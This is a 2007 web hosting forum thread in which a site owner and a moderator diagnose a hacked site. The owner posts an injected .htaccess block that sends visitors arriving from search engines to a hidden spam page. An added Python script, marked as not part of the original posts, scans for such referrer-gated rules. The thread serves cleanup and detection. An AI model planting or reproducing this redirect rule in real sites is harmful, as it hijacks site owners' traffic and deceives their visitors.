Web Hosting Forum | Lunarpages
Author Topic: Strange Google Referrer Website Hack, need help.  (Read 1068 times)
yosstek
« on: October 30, 2007, 11:40:47 AM »

Hi Everyone,
I already got my Lunarpages account suspended once and I do not want to get it suspended again, but I do not know how to solve this problem:
A few weeks ago I got an email from an anonymous person saying that my site has spam on it. I checked and sure enough they were right. I removed it but the files reappeared and I got suspended on Lunarpages.
Lunarpages was kind enough to unsuspend me and let me delete the files.
Now, I thought that deleting the files would help, but I was wrong.
When you go to my website normally http://www.yosstek.com, it shows my normal blue/green page with a flash animation. However, if you search "yosstek" in Google and click on the link to my site, the spam page shows up!
I have no idea how they did it but the hackers/spammers managed to modify my site so that if Google is the referrer then it shows the spam page. I am baffled as to how to fix the problem!
Does anyone know what I can do at all?


Mitch
« Reply #1 on: October 30, 2007, 11:45:34 AM »

Is the spam page a Blogger blog?  That is what shows up when you go to your domain /index.php.  I would check your .htaccess file and look for any oddball redirects that might be in there.  Also make sure that it is CHMODed to 644. 

Foolish Mitch the Moderator

yosstek
« Reply #2 on: October 30, 2007, 11:52:41 AM »

Yes, that is the page that shows up, but it is a fake blogger page.
Which .htaccess should I check, just on the main directory or in every single one?
Thank you
Mitch
« Reply #3 on: October 30, 2007, 12:03:07 PM »

I would check 'em all just to be safe, also might be time to change your passwords and logins as well.  Good luck hunting this down.  Looks like whoever did it was trying to steal any of your traffic via Google.
yosstek
« Reply #4 on: October 30, 2007, 12:08:32 PM »

Whoa!
I checked the .htaccess at first and I got nothing but this:

Code:
ErrorDocument 404 /404.shtml

Options All -Indexes

But then I visited my website, chmod-ed everything to 644 and got this:
Code:
ErrorDocument 404 /404.shtml

# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /ganizzyextremeblog/wp-content/themes/default/iqexepo/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
Options All -Indexes

Thank you very much!
I wonder if they used a WordPress exploit for that, because the blog is WordPress and it looks like that's where they placed the trojan files....
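
The "check 'em all" advice from this thread, as an added example that is not part of the original posts: a Python scan that walks a document root, flags every RewriteRule gated on a search-engine Referer condition like the one posted above, and reports group- or world-writable .htaccess files. The function names are hypothetical, the engine list is a subset of the names in the posted rule, the sample input is constructed, and a hit is a triage lead rather than proof of compromise.

```python
import os, re, stat

# Engine names to look for in a Referer pattern (subset of the rule posted above).
ENGINES = re.compile(r"google|msn|yahoo|yandex|dogpile|alltheweb", re.I)
DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(.*?)\s*$", re.I)

def scan_htaccess(text):
    """Return (line_no, target) for each RewriteRule gated on a search-engine Referer."""
    findings, gated = [], False
    for no, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)  # tolerates heavy leading/trailing whitespace
        if not m:
            continue
        kind, rest = m.group(1).lower(), m.group(2)
        if kind == "rewritecond":
            parts = rest.split(None, 1)  # test string, then pattern and flags
            if len(parts) == 2 and parts[0].upper() == "%{HTTP_REFERER}" and ENGINES.search(parts[1]):
                gated = True
        else:  # a RewriteRule consumes the conditions stacked before it
            if gated:
                fields = rest.split()
                findings.append((no, fields[1] if len(fields) > 1 else ""))
            gated = False
    return findings

def scan_tree(root):
    """Check every .htaccess under root; return {path: (octal mode, findings)}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            mode = stat.S_IMODE(os.stat(path).st_mode)
            with open(path, errors="replace") as fh:
                hits = scan_htaccess(fh.read())
            if hits or mode & 0o022:  # also flag group/world-writable files
                report[path] = (oct(mode), hits)
    return report

# Constructed sample modelled on the injected block above (engine list and path shortened).
SAMPLE = r"""ErrorDocument 404 /404.shtml
        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo)\. [NC]
        RewriteCond %{TIME_SEC} <54
        RewriteRule ^.*$ /blog/wp-content/themes/default/x/t.htm [L]
Options All -Indexes
"""

if __name__ == "__main__":
    print(scan_htaccess(SAMPLE))
```

Run `scan_tree` against `public_html` after cleanup and again later; in this thread the spam files reappeared after the first deletion.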
yosstek
« Reply #5 on: October 30, 2007, 12:10:10 PM »

Sorry, one more thing.
When I put chmod 644 on my site it doesn't allow access.
It says:
Forbidden
You don't have permission to access / on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
Mitch
« Reply #6 on: October 30, 2007, 12:15:55 PM »

Yep I saw that, at least you're not getting the spam any longer.

When somebody types in your domain, how is your web site set up to show your domain?  Is your actual web site in index.php or is it in a subfolder?  You might need to set that up again if it got messed up when clearing out your public_html's .htaccess file.
yosstek
« Reply #7 on: October 30, 2007, 12:28:18 PM »

My website is set to go to my index.php file, I believe.
Well, I set the chmod to 755 on all my files in "public_html" and I also set "public_html" to 755. Will that be ok?
Mitch
« Reply #8 on: October 30, 2007, 12:30:49 PM »

Yep, looks like you got it fixed.
yosstek
« Reply #9 on: October 30, 2007, 12:32:13 PM »

Thanks again, Mitch